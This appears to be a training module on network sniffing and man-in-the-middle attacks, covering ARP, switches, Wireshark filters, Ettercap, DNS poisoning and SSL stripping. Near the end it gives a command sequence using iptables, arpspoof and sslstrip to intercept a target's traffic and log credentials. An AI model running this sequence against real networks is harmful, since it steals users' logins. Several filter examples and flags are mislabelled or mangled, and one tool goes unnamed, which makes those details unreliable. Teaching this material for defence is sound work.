Module: Sniffing And Network Hacking
Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. It is a form of “tapping phone wires” and get to know about the conversation. It is also called wiretapping applied to the computer networks.
Network Interface Card, the NIC is also referred to as an Ethernet card and network adapter. It is an expansion card that enables a computer to connect to a network; such as a home network, or the Internet using an Ethernet cable with an RJ-45 connector.
In a network, promiscuous mode allows a network device to intercept and read each network packet that arrives in its entirety. This mode of operation is sometimes given to a network snoop server that captures and saves all packets for analysis (for example, for monitoring network usage).
In an Ethernet local area network (LAN), promiscuous mode is a mode of operation in which every data packet transmitted can be received and read by a network adapter. Promiscuous mode must be supported by each network adapter as well as by the input/output driver in the host operating system. Promiscuous mode is often used to monitor network activity.
Promiscuous mode is the opposite of non-promiscuous mode. When a data packet is transmitted in non-promiscuous mode, all the LAN devices “listen to” the data to determine if the network address included in the data packet is theirs. If it isn’t, the data packet is passed onto the next LAN device until the device with the correct network address is reached. That device then receives and reads the data.
A network hub is a device that allows multiple computers to communicate with each other over a network. It has several Ethernet ports that are used to connect two or more network devices together. Each computer or device connected to the hub can communicate with any other device connected to one of the hub’s Ethernet ports.
Hubs are similar to switches, but are not as “smart.” While switches send incoming data to a specific port, hubs broadcast all incoming data to all active ports. For example, if five devices are connected to an 8-port hub, all data received by the hub is relayed to the five active ports. While this ensures the data gets to the right port, it also leads to inefficient use of the network bandwidth. For this reason, switches are much more commonly used than hubs.
In a network, a switch is a device that channels incoming data from any of multiple input ports to the specific output port that will take it toward its intended destination.
In a local area network (LAN) using Ethernet, a network switch determines where to send each incoming message frame by looking at the physical device address (also known as the Media Access Control address or MAC address). Switches maintain tables that match each MAC address to the port from which the MAC address has been received. If a frame is to be forwarded to a MAC address that is unknown to the switch infrastructure, it is flooded to all ports in the switching domain. Broadcast and multicast frames are also flooded. This is known as BUM flooding — broadcast, unknown unicast, and multicast flooding. This capability makes a switch a Layer 2 or data-link layer device in the Open Systems Interconnection (OSI) communications model.
Address Resolution Protocol (ARP)
Address Resolution Protocol (ARP) is a protocol for mapping an Internet Protocol address (IP address) to a physical machine address that is recognized in the local network. For example, in IP Version 4, the most common level of IP in use today, an address is 32 bits long. In an Ethernet local area network, however, addresses for attached devices are 48 bits long. (The physical machine address is also known as a Media Access Control or MAC address.) A table, usually called the ARP cache, is used to maintain a correlation between each MAC address and its corresponding IP address. ARP provides the protocol rules for making this correlation and providing address conversion in both directions.
When an incoming packet destined for a host machine on a particular local area network arrives at a gateway, the gateway asks the ARP program to find a physical host or MAC address that matches the IP address. The ARP program looks in the ARP cache and, if it finds the address, provides it so that the packet can be converted to the right packet length and format and sent to the machine. If no entry is found for the IP address, ARP broadcasts a request packet in a special format to all the machines on the LAN to see if one machine knows that it has that IP address associated with it. A machine that recognizes the IP address as its own returns a reply so indicating. ARP updates the ARP cache for future reference and then sends the packet to the MAC address that replied.
Unicast, Multicast and Broadcast
Sniffing Tools to use for sniffing attack
Wireshark – tool is often referred to as a network analyzer, network protocol analyzer or sniffer. Wireshark, formerly known as Ethereal, can be used to examine the details of traffic at a variety of levels ranging from connection-level information to the bits that make up a single packet.
1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]
2. ip.addr==10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses]
3. https or dns [sets a filter to display all https and dns]
4. tcp.port==4000 [sets a filter for any TCP packet with 4000 as a source or dest port]
5. tcp.flags.reset==1 [displays all TCP resets]
6. https.request [displays all HTTP GET requests]
7. tcp contains traffic [displays all TCP packets that contain the word ‘traffic’. Excellent when searching on a specific string or user ID]
8. !(arp or icmp or dns) [masks out arp, icmp, dns, or whatever other protocols may be background noise. Allowing you to focus on the traffic of interest]
9. udp contains 33:27:58 [sets a filter for the HEX values of 0x33 0x27 0x58 at any offset]
10. tcp.analysis.retransmission [displays all retransmissions in the trace. Helps when tracking down slow application performance and packet loss]
So there are a few of my favorite Wireshark filters (which does not include the Follow TCP Stream filter). How about you? What are your most commonly used filters?
is a password recovery tool for Microsoft Windows. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks.
Ettercap – Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
DNS poisoning – DNS cache poisoning, also known as DNS spoofing, is a type of attack that exploits vulnerabilities in the domain name system (DNS) to divert Internet traffic away from legitimate servers and towards fake ones. One of the reasons DNS poisoning is so dangerous is because it can spread from DNS server to DNS server.
SSl strips – is a type of MITM attack technique by which a website secured with HTTPS is downgraded to HTTP. In SSL Strip, all the traffic coming from the victim’s machine is routed towards a proxy which is created by the attacker.
# Enable IP Forward on the computer
– Echo 1 > /proc/sys/net/ipv4/ip_forward
– iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
– arpspoof -I eth0 -t -Target ip- -r -Gateway IP-
– sslstrip -l 8080 – on a new terminal
# Credentials will be saved in sslstrip.log
Iptables is a Linux command line firewall that allows system administrators to manage incoming and outgoing traffic via a set of configurable table rules. Iptables uses a set of tables which have chains that contain set of built-in or user defined rules.
xplico – tool to monitoring the packets.